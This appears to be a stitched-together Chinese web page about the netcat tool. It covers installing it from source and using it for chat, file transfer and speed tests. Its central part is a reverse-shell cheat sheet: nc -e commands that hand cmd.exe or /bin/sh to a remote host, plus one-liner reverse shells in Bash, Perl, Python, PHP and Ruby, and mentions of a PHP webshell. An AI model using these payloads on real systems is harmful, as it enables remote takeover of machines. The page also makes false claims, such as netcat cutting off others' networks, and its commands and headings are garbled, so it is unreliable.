netcat,netcat工具
怎么看linux服务器是否带netcat
netcat这个工具的命令是nc,只需要在终端命令行执行nc命令,如果命令行提示没有找到命令(Command no found),就说明Linux系统上没有netcat;反之,如果输入nc命令后显示了netcat的帮助信息,就说明Linux系统上带有netcat。
netcat的基本功能有哪些
可以自动搜索局域网里的电脑连接,也就是可以看到别人的IP。直接切断别人的网络,为自己的电脑加速
linux怎么安装netcat
etcat-0.7.1.tar.gz
然后当然是解压了
tar zxvf netcat-0.7.1.tar.gz
解压完毕之后会生成目录,要cd进去
cd netcat-0.7.1
然后进行编译前的配置。
./configure
配置完了之后就可以make编译了。
编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat -h.如图
本地Windows监听
nc -vv -l -p 1234
远程Windows转发
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234
远程Linux转发
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php
———————NetCat for linux 参数e————————-
下载netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句话反弹命令
[Bash]
bash -i /dev/tcp/10.0.0.1/8080 01
[PERL]
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”S”);open(STDOUT,”S”);open(STDERR,”S”);exec(“/bin/sh -i”);};’
[Python]
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’
[PHP]
php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i 3 3 23″);’
[Ruby]
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1″,1234).to_i;exec sprintf(“/bin/sh -i %d %d 2%d”,f,f,f)’
[Netcat]
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 10.0.0.1 1234 /tmp/f
NetCat使用介绍
NetCat号称网络工具中的瑞士军刀,可以用它来做很多有用事情,比如侦听端口、端口扫描、传输文件、网络测速等等
机器IP:118.178.255.158
机器IP:47.96.151.115
可以用这个和妹子聊天,比阅后即焚更安全!
监听UDP端口
-w2 设置2秒超时时间
测试下来,nc传文件与scp传文件速度无差别,用tcpdump查看数据包个数也差不多,nc传输文件比scp好在不需要输入密码.
测试网速原理就是采用文件传输方式,把来自一台机器的/dev/zero一直发送给另外一台的机器的/dev/null,这样测试网速因为不需要写磁盘会更精确.
接收端
发送端
在接收端测试网速
阿里云测试机网速峰值为5Mbps,换算一下 5*1024/8 =640KB/s,与测试结果的recv相差不大,说明阿里云没有骗人。
受控端
控制端
这是否就意味我没有远程机的root账号而能做很多事了?